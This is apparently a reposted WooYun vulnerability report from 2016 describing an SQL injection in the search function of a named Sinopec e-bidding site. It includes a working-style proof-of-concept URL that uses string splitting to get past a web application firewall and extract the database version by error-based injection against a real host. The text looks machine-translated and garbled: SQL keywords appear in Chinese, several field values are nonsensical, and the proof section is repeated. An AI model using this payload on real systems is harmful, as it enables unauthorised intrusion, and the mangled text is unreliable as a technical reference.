中石化某业务SQL注入漏洞(绕过WAF)
漏洞标题 中石化某业务SQL注入漏洞(绕过WAF) 相关厂商 中国石油化工股份有限公司 漏洞作者 路人甲 提交时间 2016-04-29 10:29 公开时间 2016-06-17 16:10 漏洞类…
漏洞标题
中石化企业SQL注入漏洞(绕过WAF)
相关制造商
中国石油化工股份有限公司
漏洞作者
过路人
提交时间
2016-04-29 10: 29
公共时间
2016-06-17 16: 10
漏洞类型
SQL注入漏洞
危险等级
在
自我评估等级
10
漏洞状态
制造商已确认
标签标签
漏洞详细信息
参数关键字在搜索功能中注入:
http://ebidding.sinopec.com: 8880/TPWeb4AAA/Showinfo/SearchResult.aspx?keyword='查询内容'& searchtype=title
错误注入,应该有WAF并且不会继续深入
漏洞证明:
http://ebidding.sinopec.com: 8880/TPWeb4AAA/Showinfo/SearchResult.aspx?& searchtype=title& keyword=1'exec('selec'%2b't convert(int,(@@ version))')选择名称orderNum,名称InfoDate,来自[sysobjects]的名称PubInWebDate,其中'1'='
修理计划:
版权声明:请注明出处。居民A @乌云
错误注入,应该有WAF并且不会继续深入
漏洞证明:
http://ebidding.sinopec.com: 8880/TPWeb4AAA/Showinfo/SearchResult.aspx?& searchtype=title& keyword=1'exec('selec'%2b't convert(int,(@@ version))')选择名称orderNum,名称InfoDate,来自[sysobjects]的名称PubInWebDate,其中'1'='
修理计划:
版权声明:请注明出处。居民A @乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 767 )
- 分类:黑客技术
